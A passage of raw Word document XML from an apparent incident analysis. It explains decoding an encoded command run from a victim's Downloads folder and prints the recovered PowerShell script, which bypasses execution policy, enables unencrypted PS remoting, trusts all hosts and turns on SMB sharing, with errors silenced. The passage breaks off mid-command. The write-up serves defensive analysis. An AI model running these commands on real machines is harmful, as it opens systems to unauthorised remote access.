    <w:p w:rsidRPr="00A44022" w:rsidR="00A44022" w:rsidP="00A44022" w:rsidRDefault="00A44022" w14:paraId="426A0EC5" w14:textId="77777777">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A44022">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:t>We can see both the location of the file executed from the Downloads folder of the victim profile and the encoded command.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidRPr="00A44022" w:rsidR="00A44022" w:rsidP="00A44022" w:rsidRDefault="00A44022" w14:paraId="79C571E1" w14:textId="77777777">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidRPr="00A44022" w:rsidR="00A44022" w:rsidP="00A44022" w:rsidRDefault="00A44022" w14:paraId="26AECE89" w14:textId="77777777">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A44022">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:t xml:space="preserve">Then taking the encoded command and entering it into </w:t>
      </w:r>
      <w:hyperlink w:history="1" r:id="rId19">
        <w:r w:rsidRPr="00A44022">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          </w:rPr>
          <w:t>https://www.base64decode.org/</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00A44022">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:t xml:space="preserve"> with AUTO-DETECT, we can retrieve the original script.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidRPr="00A44022" w:rsidR="00A44022" w:rsidP="00A44022" w:rsidRDefault="00A44022" w14:paraId="0479ECFA" w14:textId="77777777">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidRPr="00A44022" w:rsidR="00A44022" w:rsidP="00A44022" w:rsidRDefault="00A44022" w14:paraId="5484E027" w14:textId="77777777">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A44022">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">        $</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00A44022">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>ProgressPreference</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00A44022">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> = '</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00A44022">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>SilentlyContinue</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00A44022">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>'</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidRPr="00A44022" w:rsidR="00A44022" w:rsidP="00A44022" w:rsidRDefault="00A44022" w14:paraId="08980DE4" w14:textId="77777777">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A44022">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">        Set-</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00A44022">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>ExecutionPolicy</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00A44022">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> Bypass -Scope Process -Force -</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00A44022">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>ErrorAction</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00A44022">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00A44022">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>SilentlyContinue</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w:rsidRPr="00A44022" w:rsidR="00A44022" w:rsidP="00A44022" w:rsidRDefault="00A44022" w14:paraId="4C598F83" w14:textId="77777777">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A44022">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">        Set-</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00A44022">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>NetConnectionProfile</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00A44022">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> -Name "Network" -</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00A44022">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>NetworkCategory</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00A44022">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> Private -</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00A44022">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Confirm:$</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00A44022">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>false -</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00A44022">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>ErrorAction</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00A44022">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00A44022">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>SilentlyContinue</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w:rsidRPr="00A44022" w:rsidR="00A44022" w:rsidP="00A44022" w:rsidRDefault="00A44022" w14:paraId="22E36A76" w14:textId="77777777">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A44022">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">        Enable-</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00A44022">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>PSRemoting</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00A44022">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> -Force -</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00A44022">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>SkipNetworkProfileCheck</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00A44022">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> -</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00A44022">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>ErrorAction</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00A44022">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00A44022">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>SilentlyContinue</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w:rsidRPr="00A44022" w:rsidR="00A44022" w:rsidP="00A44022" w:rsidRDefault="00A44022" w14:paraId="0977EA7E" w14:textId="77777777">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A44022">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">        Set-Item </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00A44022">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>wsman</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00A44022">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>:\\localhost\\Service\\</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00A44022">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>AllowUnencrypted</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00A44022">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> -Value $true -Force -</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00A44022">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>ErrorAction</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00A44022">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00A44022">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>SilentlyContinue</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w:rsidRPr="00A44022" w:rsidR="00A44022" w:rsidP="00A44022" w:rsidRDefault="00A44022" w14:paraId="586B8B09" w14:textId="77777777">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A44022">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">        Set-Item </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00A44022">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>wsman</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00A44022">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>:\\localhost\\Client\\</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00A44022">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>TrustedHosts</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00A44022">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> -Value '*' -Force -</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00A44022">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>ErrorAction</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00A44022">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00A44022">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>SilentlyContinue</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w:rsidRPr="00A44022" w:rsidR="00A44022" w:rsidP="00A44022" w:rsidRDefault="00A44022" w14:paraId="30C1B901" w14:textId="77777777">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A44022">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">        Restart-Service </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00A44022">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>WinRM</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00A44022">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> -Force -</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00A44022">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>ErrorAction</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00A44022">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00A44022">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>SilentlyContinue</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w:rsidRPr="00A44022" w:rsidR="00A44022" w:rsidP="00A44022" w:rsidRDefault="00A44022" w14:paraId="12E321F3" w14:textId="77777777">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A44022">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">        Set-</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00A44022">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>SmbServerConfiguration</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00A44022">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> -EnableSMB2Protocol $true -Force -</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00A44022">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Confirm:$</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00A44022">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>false -</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00A44022">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>ErrorAction</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00A44022">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00A44022">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>SilentlyContinue</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w:rsidRPr="00A44022" w:rsidR="00A44022" w:rsidP="00A44022" w:rsidRDefault="00A44022" w14:paraId="2E9A1ECD" w14:textId="77777777">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A44022">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">        Start-Service </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00A44022">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>LanmanServer</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00A44022">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> -</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00A44022">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>ErrorAction</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00A44022">
        <w:rPr>
